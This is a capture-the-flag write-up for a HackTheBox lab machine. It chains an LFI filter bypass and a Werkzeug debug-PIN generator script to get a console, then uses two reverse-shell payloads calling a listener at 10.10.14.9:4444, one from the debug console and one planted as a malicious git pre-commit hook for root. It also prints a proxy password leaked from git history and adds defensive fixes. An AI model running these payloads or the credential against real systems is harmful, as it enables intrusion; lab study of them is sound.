       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/objects/e6/
      15  Stored       15   0% 04-28-2022 13:45 98a4a0b4  .git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
      23  Stored       23   0% 04-28-2022 14:50 abd3cf9e  .git/HEAD
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/refs/
       0  Stored        0   0% 04-28-2022 13:55 00000000  .git/refs/heads/
      41  Stored       41   0% 04-28-2022 13:55 6f4bfaf1  .git/refs/heads/public
      41  Stored       41   0% 04-28-2022 13:47 3f826e2b  .git/refs/heads/dev
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/refs/tags/
      39  Stored       39   0% 04-28-2022 13:55 f1b92618  .git/COMMIT_EDITMSG
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/hooks/
     424  Defl:N      265  38% 04-28-2022 13:45 024cc0cf  .git/hooks/pre-applypatch.sample
    1348  Defl:N      669  50% 04-28-2022 13:45 b18fd804  .git/hooks/pre-push.sample
    1492  Defl:N      744  50% 04-28-2022 13:45 303613ed  .git/hooks/prepare-commit-msg.sample
    4898  Defl:N     2015  59% 04-28-2022 13:45 5158ec84  .git/hooks/pre-rebase.sample
    1638  Defl:N      905  45% 04-28-2022 13:45 2a671d12  .git/hooks/pre-commit.sample
     478  Defl:N      279  42% 04-28-2022 13:45 09f84f85  .git/hooks/applypatch-msg.sample
     416  Defl:N      255  39% 04-28-2022 13:45 5ef33f44  .git/hooks/pre-merge-commit.sample
     896  Defl:N      503  44% 04-28-2022 13:45 10caf8e9  .git/hooks/commit-msg.sample
     544  Defl:N      329  40% 04-28-2022 13:45 96f8c492  .git/hooks/pre-receive.sample
     189  Defl:N      138  27% 04-28-2022 13:45 c0f70c9a  .git/hooks/post-update.sample
    3610  Defl:N     1141  68% 04-28-2022 13:45 2544211a  .git/hooks/update.sample
    3079  Defl:N     1463  53% 04-28-2022 13:45 8e0e04aa  .git/hooks/fsmonitor-watchman.sample
    5746  Defl:N     2509  56% 04-28-2022 14:50 4b79d9c0  .git/index
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/logs/
    1741  Defl:N      405  77% 04-28-2022 14:50 0c5febdd  .git/logs/HEAD
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/logs/refs/
       0  Stored        0   0% 04-28-2022 13:45 00000000  .git/logs/refs/heads/
     497  Defl:N      204  59% 04-28-2022 13:55 4d35a674  .git/logs/refs/heads/public
     581  Defl:N      233  60% 04-28-2022 13:47 b6e8e48d  .git/logs/refs/heads/dev
--------          -------  ---                            -------
 6204731          2440275  61%                            248 files
```
Besides the application code, the archive also contains the .git directory, where we can see the changes made to the code
```
$ git log --raw
commit 2c67a52253c6fe1f206ad82ba747e43208e8cfd9 (HEAD -> public)
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:55:55 2022 +0200

    clean up dockerfile for production use

:100644 100644 76c7768 5b0553c M	Dockerfile

commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:45:17 2022 +0200

    initial

:000000 100644 0000000 76c7768 A	Dockerfile
:000000 100644 0000000 e69de29 A	app/INSTALL.md
:000000 100644 0000000 5c2ecc0 A	app/app/__init__.py
:000000 100644 0000000 877f291 A	app/app/configuration.py
:000000 100644 0000000 91e52af A	app/app/static/css/style.css
:000000 100644 0000000 b335ef9 A	app/app/static/js/ie10-viewport-bug-workaround.js
:000000 100644 0000000 401c744 A	app/app/static/js/script.js
:000000 100644 0000000 259a9e2 A	app/app/static/vendor/bootstrap/css/bootstrap-grid.css
:000000 100644 0000000 8661e3e A	app/app/static/vendor/bootstrap/css/bootstrap-grid.css.map
:000000 100644 0000000 6533f31 A	app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css
:000000 100644 0000000 1b393db A	app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css.map
:000000 100644 0000000 91b0fc4 A	app/app/static/vendor/bootstrap/css/bootstrap-reboot.css
:000000 100644 0000000 701f671 A	app/app/static/vendor/bootstrap/css/bootstrap-reboot.css.map
:000000 100644 0000000 5308df6 A	app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css
:000000 100644 0000000 b8551f7 A	app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css.map
:000000 100644 0000000 8eac957 A	app/app/static/vendor/bootstrap/css/bootstrap.css
:000000 100644 0000000 521afc5 A	app/app/static/vendor/bootstrap/css/bootstrap.css.map
:000000 100644 0000000 86b6845 A	app/app/static/vendor/bootstrap/css/bootstrap.min.css
:000000 100644 0000000 b939eb6 A	app/app/static/vendor/bootstrap/css/bootstrap.min.css.map
:000000 100644 0000000 5344522 A	app/app/static/vendor/bootstrap/js/bootstrap.bundle.js
:000000 100644 0000000 93cf73e A	app/app/static/vendor/bootstrap/js/bootstrap.bundle.js.map
:000000 100644 0000000 78c533b A	app/app/static/vendor/bootstrap/js/bootstrap.bundle.min.js
:000000 100644 0000000 54d2495 A	app/app/static/vendor/bootstrap/js/bootstrap.bundle.min.js.map
:000000 100644 0000000 f1e68d3 A	app/app/static/vendor/bootstrap/js/bootstrap.js
:000000 100644 0000000 e5f6ce9 A	app/app/static/vendor/bootstrap/js/bootstrap.js.map
:000000 100644 0000000 e5a2429 A	app/app/static/vendor/bootstrap/js/bootstrap.min.js
:000000 100644 0000000 757dbf3 A	app/app/static/vendor/bootstrap/js/bootstrap.min.js.map
:000000 100644 0000000 e1e271c A	app/app/static/vendor/font-awesome/all.min.css
:000000 100644 0000000 773ad95 A	app/app/static/vendor/jquery/jquery-3.4.1.js
:000000 100644 0000000 a1c07fd A	app/app/static/vendor/jquery/jquery-3.4.1.min.js
:000000 100644 0000000 e15edef A	app/app/static/vendor/jquery/jquery-3.4.1.min.map
:000000 100644 0000000 a88adb2 A	app/app/static/vendor/popper/popper-utils.js
:000000 100644 0000000 50e078a A	app/app/static/vendor/popper/popper-utils.js.map
:000000 100644 0000000 f6560a1 A	app/app/static/vendor/popper/popper-utils.min.js
:000000 100644 0000000 7fda3a9 A	app/app/static/vendor/popper/popper-utils.min.js.map
:000000 100644 0000000 7fa913d A	app/app/static/vendor/popper/popper.js
:000000 100644 0000000 d56fdda A	app/app/static/vendor/popper/popper.js.flow
:000000 100644 0000000 9633363 A	app/app/static/vendor/popper/popper.js.map
:000000 100644 0000000 8a17212 A	app/app/static/vendor/popper/popper.min.js
:000000 100644 0000000 7107f61 A	app/app/static/vendor/popper/popper.min.js.map
:000000 100644 0000000 29218c7 A	app/app/templates/index.html
:000000 100644 0000000 316cd1d A	app/app/templates/success.html
:000000 100644 0000000 fd19858 A	app/app/templates/upload.html
:000000 100644 0000000 eebf49d A	app/app/utils.py
:000000 100644 0000000 f2744c6 A	app/app/views.py
:000000 100644 0000000 b64e36b A	app/run.py
:000000 100755 0000000 1b76267 A	build-docker.sh
:000000 100644 0000000 a14dd36 A	config/supervisord.conf
```
Diffing the Dockerfile between the two commits turns up an interesting detail:
$ git diff ee9d9f1ef9156c787d53074493e39ae364cd1e05:Dockerfile HEAD:Dockerfile diff --git a/Dockerfile b/Dockerfile index 76c7768..5b0553c 100644 --- a/Dockerfile +++ b/Dockerfile @@ -29,7 +29,6 @@ ENV PYTHONDONTWRITEBYTECODE=1 # Set mode ENV MODE="PRODUCTION" -# ENV FLASK_DEBUG=1 # Run supervisord CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"] |
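Review bot: Deleting a line that was already commented out changes nothing at build time, so this hunk gives no evidence that the Werkzeug debugger is actually off in the production image. Because supervisord starts `python /app/run.py` directly (see the `command=` line in `config/supervisord.conf`), an explicit `debug=True` passed to `app.run()` in `run.py` would enable the debugger regardless of `FLASK_DEBUG`; a "clean up for production" change should fix that call site and confirm that an unhandled exception returns a plain 500 rather than the interactive traceback page.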
The line that had been commented out (and is dropped altogether in this commit) is `FLASK_DEBUG=1`, which turns on the Werkzeug debugger. With the debugger active, an unhandled exception renders an interactive traceback page with a Python console, protected by a PIN, so let's see whether we can get that PIN.
The console prompts for a 9-digit PIN in the format nnn-nnn-nnn. Werkzeug prints the PIN to the server's stdout when the app starts, which we cannot see, so we have to recompute it ourselves.
Following the HackTricks links we saw earlier, the PIN can be reconstructed, provided we can first collect certain pieces of information from the target.
Six pieces are needed: three of them are public, one leaks because the app is in debug mode, and the other two are private; to obtain those last two we'll need to exploit a second vulnerability, a local file inclusion (LFI).
Going through the Werkzeug code, the values are:
– username -> the user that launched this Flask instance (what `getpass.getuser()` returns in the process)
– modname -> always `flask.app`
– getattr(app, '__name__', getattr(app.__class__, '__name__')) -> always `Flask`
– getattr(mod, '__file__', None) -> the absolute path of `app.py` inside the installed Flask package; this leaks in the traceback page when we trigger an error, precisely because the app is in debug mode
– uuid.getnode() -> the server's MAC address as a decimal integer; the hex value can be read from `/sys/class/net/{iface}/address`
– get_machine_id() -> the contents of `/etc/machine-id` (or `/proc/sys/kernel/random/boot_id` if that file is missing), followed by the last `/`-separated component of the first line of `/proc/self/cgroup`, which inside a Docker container is the container id. Older PIN-cracking write-ups leave this cgroup part out.
Now that we know what we need, the username comes from the application's supervisord configuration file in the repo:
```ini
$ cat supervisord.conf
[supervisord]
user=root
nodaemon=true
logfile=/dev/null
logfile_maxbytes=0
pidfile=/run/supervisord.pid

[program:flask]
command=python /app/run.py
stdout_logfile=/dev/stdout
stdout_logfile_maxbytes=0
stderr_logfile=/dev/stderr
stderr_logfile_maxbytes=0
```
For the last two values, the MAC address and the machine id, we go back to the source code and find a local file inclusion (LFI) vulnerability.
The code in question replaces every `../` with an empty string. But what happens if we try a double slash, `..//`? Each `..//` loses its `../` and leaves a bare `/` behind, so `..//..//..//etc/passwd` turns into `///etc/passwd`: an absolute path, which is exactly what we want the file-serving code to open.
Over to Burp to test whether the vulnerability is exploitable.
And bingo, the LFI gives us the MAC address (read from `/sys/class/net/eth0/address`, then converted from hex to decimal); the remaining values needed to generate our PIN come out the same way.
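The application code the write-up refers to is not reproduced on this page, so the following Python is an added illustration modelled on the description above, not the application's own code: a filter that deletes every `../` (repeated until none is left, so it is not just a single-pass bypass), the `os.path.join` step that makes the leftover slashes dangerous, and a hardened resolver that checks containment after resolving. `/app/public/uploads` is an assumed upload directory.

```python
import os

# Assumed upload root; the real application's directory is not shown on the page.
UPLOAD_DIR = "/app/public/uploads"


def strip_dotdot(name: str) -> str:
    """The filter as the write-up describes it: delete every '../'.
    It repeats until nothing is left, so '....//' style nesting does not help;
    the slashes that remain are the real problem."""
    while "../" in name:
        name = name.replace("../", "")
    return name


def naive_resolve(user_path: str) -> str:
    """Vulnerable: filter, then os.path.join.  If the filtered component
    starts with '/', os.path.join discards everything before it, so
    '..//..//..//etc/passwd' -> '///etc/passwd' -> '/etc/passwd'."""
    return os.path.normpath(os.path.join(UPLOAD_DIR, strip_dotdot(user_path)))


def safe_resolve(user_path: str):
    """Hardened: resolve first, then prove the result is still inside the
    upload root.  Returns None for anything that escapes.  commonpath, not
    startswith, so '/app/public/uploads_evil' is rejected too."""
    base = os.path.realpath(UPLOAD_DIR)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    for p in ("report.txt", "../../../etc/passwd", "..//..//..//etc/passwd"):
        print(f"{p:28} naive={naive_resolve(p):32} safe={safe_resolve(p)}")
```

In a Flask handler the idiomatic fix is `send_from_directory(UPLOAD_DIR, path)` (which goes through `werkzeug.security.safe_join`) rather than hand-rolled string filtering; the containment check above is the same idea spelled out.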
With all the values collected, we take the script from HackTricks and make a few changes. The version on that site hashes with MD5, which got us nowhere because it targets an older Werkzeug debugger; Werkzeug 2.x (2.1.2 here) uses SHA-1, so we change the code accordingly and end up with this:
```python
import hashlib
from itertools import chain

# Bits Werkzeug feeds into the PIN hash (werkzeug/debug/__init__.py,
# get_pin_and_cookie_name). Werkzeug 2.x hashes with SHA-1; the HackTricks
# version uses MD5 and only works for older releases.
probably_public_bits = [
    'root',       # username: the user running the Flask process (from supervisord.conf)
    'flask.app',  # modname
    'Flask',      # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.10/site-packages/flask/app.py',  # getattr(mod, '__file__', None), leaked by the debug traceback
]

private_bits = [
    '2485377892355',  # str(uuid.getnode()): /sys/class/net/eth0/address, hex converted to decimal
    # get_machine_id(): /etc/machine-id (or /proc/sys/kernel/random/boot_id)
    # + last component of the first line of /proc/self/cgroup
    'd141de1b-e2ca-4316-977d-62af2d4d82f62ae8cbace0fec3078d07d2007f48826c76b560b98613869f13524dae42388e00',
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

# Name of the cookie the debugger sets once the PIN is accepted; computing it
# also advances the hash state the PIN is derived from, so keep this line.
cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)
```
With our exploit ready, we run it:
```shell
$ python3 werkzeug-exploy.py
111-667-210
```
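As an added example (not the script above and not Werkzeug's own code), the following Python goes one step further back and turns the raw artefacts into the exact bits Werkzeug hashes: the hex MAC from `/sys/class/net/eth0/address` into the integer `uuid.getnode()` returns, and the raw `/etc/machine-id` and `/proc/self/cgroup` contents into `get_machine_id()`'s value, with the SHA-1 derivation wrapped in a reusable function. The MAC, machine-id and container-id values are the ones from this write-up; the `12:cpuset:/docker/...` layout of the cgroup line is an assumption about what `/proc/self/cgroup` looks like inside the container.

```python
import hashlib
from itertools import chain


def mac_to_node(mac: str) -> int:
    """Convert the hex MAC read from /sys/class/net/<iface>/address (e.g.
    '02:42:ac:11:00:03') into the integer uuid.getnode() returns for it."""
    return int(mac.strip().replace(":", "").replace("-", ""), 16)


def machine_id(id_file: bytes, cgroup_file: bytes) -> bytes:
    """Rebuild what werkzeug.debug.get_machine_id() returns on Linux: the
    first line of /etc/machine-id (pass boot_id's contents instead when
    machine-id is absent) followed by the last '/'-separated component of
    the first line of /proc/self/cgroup, which inside Docker is the
    container id."""
    value = id_file.splitlines()[0].strip() if id_file.strip() else b""
    cgroup = cgroup_file.splitlines()[0].strip() if cgroup_file.strip() else b""
    return value + cgroup.rpartition(b"/")[2]


def werkzeug_pin(probably_public_bits, private_bits):
    """The SHA-1 PIN derivation of Werkzeug 2.x (get_pin_and_cookie_name).
    Returns (pin, cookie_name); cookie_name is the __wzd... cookie the
    debugger sets once the PIN has been accepted."""
    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")
    cookie_name = "__wzd" + h.hexdigest()[:20]
    # The PIN is salted once more, zero-padded to 9 digits and then grouped
    # (9 is divisible by 3, so the nnn-nnn-nnn shape always results).
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]
    for group_size in (5, 4, 3):
        if len(num) % group_size == 0:
            pin = "-".join(num[x:x + group_size].rjust(group_size, "0")
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


def private_bits(mac: str, id_file: bytes, cgroup_file: bytes):
    """The two 'private' bits, built from files read through the LFI."""
    return [str(mac_to_node(mac)), machine_id(id_file, cgroup_file)]


# Sample input taken from this write-up; the cgroup line format is assumed.
PUBLIC_BITS = [
    "root",        # getpass.getuser(): supervisord runs the app as root
    "flask.app",   # app.__module__
    "Flask",       # app.__class__.__name__
    "/usr/local/lib/python3.10/site-packages/flask/app.py",  # flask.app.__file__
]
MAC = "02:42:ac:11:00:03"   # 2485377892355 in decimal, the value used above
MACHINE_ID_FILE = b"d141de1b-e2ca-4316-977d-62af2d4d82f6\n"
CGROUP_FILE = b"12:cpuset:/docker/2ae8cbace0fec3078d07d2007f48826c76b560b98613869f13524dae42388e00\n"


if __name__ == "__main__":
    pin, cookie = werkzeug_pin(PUBLIC_BITS, private_bits(MAC, MACHINE_ID_FILE, CGROUP_FILE))
    print(pin, cookie)
```

Fed the values above it performs the same computation as the script we ran, so it yields the same PIN; the point of the helpers is that you can paste in what the LFI returns verbatim instead of converting by hand.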
We enter the PIN in the console and we're in.
Now that we have the console, we run the following payload (10.10.14.9:4444 is our listener):
```python
# Reverse shell pasted into the Werkzeug console; 10.10.14.9:4444 is our listener.
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")
```
And we immediately get a shell back:
```shell
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.164] 60540
/app # id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
```
Once inside we look around: we are root, but it's a rough shell with little to do, and this is clearly a container, so let's find a way out of it.
Remember port 3000, which the earlier scan reported as filtered. From inside the container we can reach the Docker host on 172.17.0.1, so we use chisel to tunnel that port back to our machine.
We download the chisel binary on both our machine and the container and run it on both ends.
On our Kali box:
```shell
$ ./chisel server -p 4445 --reverse
```
And on the victim (`R:3000:172.17.0.1:3000` is a reverse forward: chisel's server end listens on port 3000 on our box and the client relays each connection to 172.17.0.1:3000, the Docker host):
```shell
/tmp # ./chisel client 10.10.14.9:4445 R:3000:172.17.0.1:3000
```
And boom, a new web portal on port 3000, now reachable as localhost:3000 on our side.
It's Gitea, an open-source self-hosted git service. We browse around, register an account... but nothing; this doesn't look like the way in yet.
Going back to the git repo we dumped earlier, we notice something we had overlooked: there is another branch.
```shell
$ git branch
  dev
* public
```
So we switch to it:
```shell
$ git checkout dev
```
And review the history of this branch (note that the "ease testing" commit touches the Dockerfile again, and "updated" modifies `views.py` and adds `app/.vscode/settings.json`, which "added gitignore" then deletes):
```text
$ git log
commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev)
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:47:24 2022 +0200

    ease testing

commit be4da71987bbbc8fae7c961fb2de01ebd0be1997
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:54 2022 +0200

    added gitignore

commit a76f8f75f7a4a12b706b0cf9c983796fa1985820
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:16 2022 +0200

    updated

commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:45:17 2022 +0200

    initial

# look at the changes in more detail
$ git log --raw
commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev)
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:47:24 2022 +0200

    ease testing

:100644 100644 76c7768 0875eda M	Dockerfile

commit be4da71987bbbc8fae7c961fb2de01ebd0be1997
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:54 2022 +0200

    added gitignore

:000000 100644 0000000 e50a290 A	.gitignore
:100644 000000 5975e3f 0000000 D	app/.vscode/settings.json

commit a76f8f75f7a4a12b706b0cf9c983796fa1985820
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:16 2022 +0200

    updated

:000000 100644 0000000 5975e3f A	app/.vscode/settings.json
:100644 100644 f2744c6 0f3cc37 M	app/app/views.py

commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:45:17 2022 +0200

    initial

:000000 100644 0000000 76c7768 A	Dockerfile
:000000 100644 0000000 e69de29 A	app/INSTALL.md
:000000 100644 0000000 5c2ecc0 A	app/app/__init__.py
:000000 100644 0000000 877f291 A	app/app/configuration.py
:000000 100644 0000000 91e52af A	app/app/static/css/style.css
:000000 100644 0000000 b335ef9 A	app/app/static/js/ie10-viewport-bug-workaround.js
:000000 100644 0000000 401c744 A	app/app/static/js/script.js
:000000 100644 0000000 259a9e2 A	app/app/static/vendor/bootstrap/css/bootstrap-grid.css
:000000 100644 0000000 8661e3e A	app/app/static/vendor/bootstrap/css/bootstrap-grid.css.map
:000000 100644 0000000 6533f31 A	app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css
:000000 100644 0000000 1b393db A	app/app/static/vendor/bootstrap/css/bootstrap-grid.min.css.map
:000000 100644 0000000 91b0fc4 A	app/app/static/vendor/bootstrap/css/bootstrap-reboot.css
:000000 100644 0000000 701f671 A	app/app/static/vendor/bootstrap/css/bootstrap-reboot.css.map
:000000 100644 0000000 5308df6 A	app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css
:000000 100644 0000000 b8551f7 A	app/app/static/vendor/bootstrap/css/bootstrap-reboot.min.css.map
:000000 100644 0000000 8eac957 A	app/app/static/vendor/bootstrap/css/bootstrap.css
:000000 100644 0000000 521afc5 A	app/app/static/vendor/bootstrap/css/bootstrap.css.map
:000000 100644 0000000 86b6845 A	app/app/static/vendor/bootstrap/css/bootstrap.min.css
```
The interesting one is `app/.vscode/settings.json`, added in a76f8f7 and deleted in be4da71, so we diff those two commits:
$ git diff a76f8f75f7a4a12b706b0cf9c983796fa1985820 be4da71987bbbc8fae7c961fb2de01ebd0be1997 diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..e50a290 --- /dev/null +++ b/.gitignore @@ -0,0 +1,26 @@ +.DS_Store +.env +.flaskenv +*.pyc +*.pyo +env/ +venv/ +.venv/ +env* +dist/ +build/ +*.egg +*.egg-info/ +_mailinglist +.tox/ +.cache/ +.pytest_cache/ +.idea/ +docs/_build/ +.vscode + +# Coverage reports +htmlcov/ +.coverage +.coverage.* +*,cover diff --git a/app/.vscode/settings.json b/app/.vscode/settings.json deleted file mode 100644 index 5975e3f..0000000 --- a/app/.vscode/settings.json +++ /dev/null @@ -1,5 +0,0 @@ -{ - "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python", - "http.proxy": "http://dev01:Soulless_Developer#2022@10.10.10.128:5187/", - "http.proxyStrictSSL": false -} |
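Review bot: Adding `.vscode` to `.gitignore` only stops future `git add` runs from picking the directory up; it does nothing for `app/.vscode/settings.json`, which was already committed in a76f8f7 and therefore remains in history. If the goal is to keep editor settings out of the repository, the ignore rule has to be paired with purging the file from history, not just with deleting it in the next commit.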
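Review bot: The deleted `settings.json` carries a plaintext credential in `http.proxy` (`dev01:Soulless_Developer#2022@10.10.10.128:5187`). Removing the file in a later commit does not remove it from history: anyone holding the repository, including whoever recovers the `.git` directory of the deployed app, gets it back with `git show a76f8f7:app/.vscode/settings.json`. The password must be treated as compromised and rotated, and the file purged from history (`git filter-repo` or equivalent) before the repository is shared.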
That gives us a username and password, dev01 / Soulless_Developer#2022, which we use to log in to the Gitea portal.
In that user's home-backup repository we find an SSH private key, so we download it.
Getting the user flag
With dev01's SSH key in hand, we log in and grab the user flag:
```shell
$ ssh -i dev01.pem dev01@10.10.11.164
The authenticity of host '10.10.11.164 (10.10.11.164)' can't be established.
ED25519 key fingerprint is SHA256:LbyqaUq6KgLagQJpfh7gPPdQG/iA2K4KjYGj0k9BMXk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.164' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-176-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Jul 23 22:12:05 UTC 2022

  System load:  0.1               Processes:              223
  Usage of /:   75.8% of 3.48GB   Users logged in:        0
  Memory usage: 22%               IP address for eth0:    10.10.11.164
  Swap usage:   0%                IP address for docker0: 172.17.0.1

16 updates can be applied immediately.
9 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Last login: Mon May 16 13:13:33 2022 from 10.10.14.23
dev01@opensource:~$ id
uid=1000(dev01) gid=1000(dev01) groups=1000(dev01)
dev01@opensource:~$ cat user.txt
8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx7
dev01@opensource:~$
```
Privilege escalation
Next stop is root. A quick look around shows this user has no root privileges of its own, so we enumerate with LinEnum and pspy and spot a very interesting scheduled process.
Every so often a file called git-sync is executed with bash; its contents:
```bash
$ cat /usr/local/bin/git-sync
#!/bin/bash

cd /home/dev01/

if ! git status --porcelain; then
    echo "No changes"
else
    day=$(date +'%Y-%m-%d')
    echo "Changes detected, pushing.."
    git add .
    git commit -m "Backup for ${day}"
    git push origin main
fi
```
The script is meant to commit whatever changed in dev01's home directory. Because the job runs as root, and git executes the repository's own hooks from `/home/dev01/.git/hooks`, a directory dev01 owns, this is our route to root. (Strictly, `git status --porcelain` exits 0 whether or not the tree is dirty, so the `else` branch, and with it `git commit` and any hooks, runs on every invocation; that only helps us.)
Looking through the user's `.git` directory we find a telling comment in `/home/dev01/.git/hooks/pre-commit.sample`:
```text
# An example hook script to verify what is about to be committed.
# Called by "git commit" with no arguments. The hook should
# exit with non-zero status after issuing an appropriate message if
# it wants to stop the commit.
#
# To enable this hook, rename this file to "pre-commit".
```
So we take the hint: we create a file named `pre-commit` in that same directory containing a reverse shell, and make it executable (git silently skips hooks that are not):
```sh
#!/bin/sh
#
# An example hook script to verify what is about to be committed.
# Called by "git commit" with no arguments. The hook should
# exit with non-zero status after issuing an appropriate message if
# it wants to stop the commit.
#
# To enable this hook, rename this file to "pre-commit".

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4444 >/tmp/f
```
Now we just start a listener and wait for the next run of the job to hand us a shell as root:
```shell
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.9] from opensource.htb [10.10.11.164] 45276
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
```
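The mechanism behind this escalation, a privileged `git commit` in a repository whose `.git/hooks` belongs to someone else, is easy to reproduce and to fix. The following Python is an added example (not the machine's git-sync script and not anything from the page): it builds a throwaway repository whose `pre-commit` hook drops a marker file, runs the commit step the way git-sync does, and then runs it the hardened way, with `core.hooksPath` pointed at an empty directory so that no repository hook can fire. The hook body and the temporary repository are constructed for the demo; it needs a `git` binary on PATH.

```python
import os
import stat
import subprocess
import tempfile

# Constructed hook: leaves a marker file in the work tree when git runs it
# (a real attacker's hook would be the reverse shell shown above).
MARKER = "hook_ran"
HOOK = f"#!/bin/sh\ntouch {MARKER}\n"


def git(repo: str, *args: str) -> subprocess.CompletedProcess:
    """Run git inside `repo` with a throwaway identity and no user/system config."""
    env = dict(os.environ, HOME=repo, GIT_CONFIG_NOSYSTEM="1",
               GIT_AUTHOR_NAME="backup", GIT_AUTHOR_EMAIL="backup@local",
               GIT_COMMITTER_NAME="backup", GIT_COMMITTER_EMAIL="backup@local")
    return subprocess.run(["git", "-C", repo, *args], env=env,
                          capture_output=True, text=True, check=False)


def make_repo_with_hook() -> str:
    """A repo like /home/dev01: the low-privileged user controls .git/hooks."""
    repo = tempfile.mkdtemp(prefix="git-sync-demo-")
    git(repo, "init", "-q")
    hooks = os.path.join(repo, ".git", "hooks")
    os.makedirs(hooks, exist_ok=True)
    hook = os.path.join(hooks, "pre-commit")
    with open(hook, "w") as f:
        f.write(HOOK)
    # git only runs hooks that are executable, hence the chmod +x in the write-up.
    os.chmod(hook, os.stat(hook).st_mode | stat.S_IXUSR)
    return repo


def git_sync(repo: str, hardened: bool) -> bool:
    """The commit step of the cron job.  Returns True if the pre-commit hook fired.

    hardened=True is what a job running as root should do: point core.hooksPath
    at an empty directory so that *no* repository hook (pre-commit, post-commit,
    pre-push, ...) is consulted.  --no-verify alone only skips pre-commit and
    commit-msg, so it is added on top rather than relied upon."""
    with open(os.path.join(repo, "notes.txt"), "a") as f:
        f.write("backup\n")
    opts = ["-c", f"core.hooksPath={tempfile.mkdtemp(prefix='no-hooks-')}"] if hardened else []
    git(repo, *opts, "add", ".")
    git(repo, *opts, "commit", "-q", "-m", "Backup", *(["--no-verify"] if hardened else []))
    return os.path.exists(os.path.join(repo, MARKER))


def commit_runs_hook(hardened: bool) -> bool:
    """Fresh repo each time so the marker from one run cannot leak into the next."""
    return git_sync(make_repo_with_hook(), hardened)


if __name__ == "__main__":
    print("default git-sync runs user hook:", commit_runs_hook(False))   # True
    print("hardened git-sync runs user hook:", commit_runs_hook(True))   # False
```

The hooksPath change closes the hole the write-up uses, but the underlying mistake is running the backup as root inside a directory a less privileged user owns; running the job as dev01 (or under a dedicated backup account with read-only access) removes the privilege boundary the hook crosses.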
Getting the root flag
Now that we're root, all that's left is to go to root's home and grab the flag:
```shell
# cd /root
# ls -l
total 16
-rw-rw-r-- 1 dev01 dev01  269 May  2 23:43 config
drwxr-xr-x 4 root  root  4096 May 20 12:38 meta
-rw-r----- 1 root  root    33 Jul 23 21:12 root.txt
drwx------ 3 root  root  4096 May  4 16:35 snap
# cat root.txt
6xxxxxxxxxxxxxxxxxxxxxxxxx9
#
```
And that's the root flag: machine completed and points collected.
If you are a HackTheBox user and liked this write-up, please give me respect at the following link